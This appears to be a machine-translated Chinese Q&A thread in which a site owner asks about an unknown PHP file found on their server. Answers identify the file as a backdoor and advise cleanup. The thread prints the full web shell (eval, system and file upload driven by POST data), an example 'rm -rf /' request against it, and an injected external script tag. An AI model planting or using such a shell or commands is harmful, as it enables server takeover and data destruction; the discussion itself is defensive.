我最近在我的服务器上发现了4个奇怪的文件(我没有上传)。文件名是这样的:goog1e7a20543b128921.php
这里面是代码:
Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
你知道这段代码应该做什么吗? 我应该开始恐慌吗?
感谢。
答案 0 :(得分:15)
是的,这是恶意代码。 这个shell脚本将允许执行代码以及上传任何文件是攻击者知道传递给它的参数。 我建议在所有文件中搜索该代码,验证文件权限并更改密码以防万一。
答案 1 :(得分:10)
我建议您使用HTML Purifier或OWASP来确保安全。
必须 禁用eval构造,如果您不使用它(除非您确实需要,否则不应该这样做。)
使用以下命令分析任何安全漏洞的服务器设置:
<强> PHPSecInfo
答案 2 :(得分:4)
这是您网络服务器的后门
它允许攻击者向http://you.com/goog1e7a20543b128921.php?s=rm -rf /发送请求以删除整个系统。
然后,您应该对您的网站进行彻底的安全审核,以确定他们是如何到达那里的。
答案 3 :(得分:4)
供参考:
if($e){eval($e);}
这允许攻击者执行他们想要的任何PHP命令。
if($s){system($s);}
这允许攻击者执行他们想要的任何系统命令,就像您的网络服务器运行的任何用户一样。
if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}
这允许攻击者上传他们想要的任何文件 - 您的网络服务器运行的用户再次确定文件权限。
总之,恐慌:-p
我确信网上有很多关于如何处理这个问题的文章。简而言之,在以后备份系统进行分析,从头开始重新安装服务器(你不知道他们对你做了什么,所以只是删除文件还不够好。)同时试图弄清楚他们是如何进入的插上洞。
答案 4 :(得分:1)
eval($ e) - 远程执行命令 系统 - eq。对于listind目录 $ _FILES ['f'] ['name'] - 用于服务器eq hack工具等的uploand脚本
答案 5 :(得分:0)
答案 6 :(得分:0)
相关:尝试将来安装phpAntiVirus,并向您的提供商询问mod_security。这可能会减轻未来的攻击。无论如何,这些文件并没有在您的服务器上实现。摆脱所有旧的PHP应用程序。
答案 7 :(得分:0)
在每个文件中查找。 <script src="http://nt02.co.in/3"></script>如果您找到使用ftp的文件,请查看文件修改日期并打开该日期修改的所有文件并将其删除。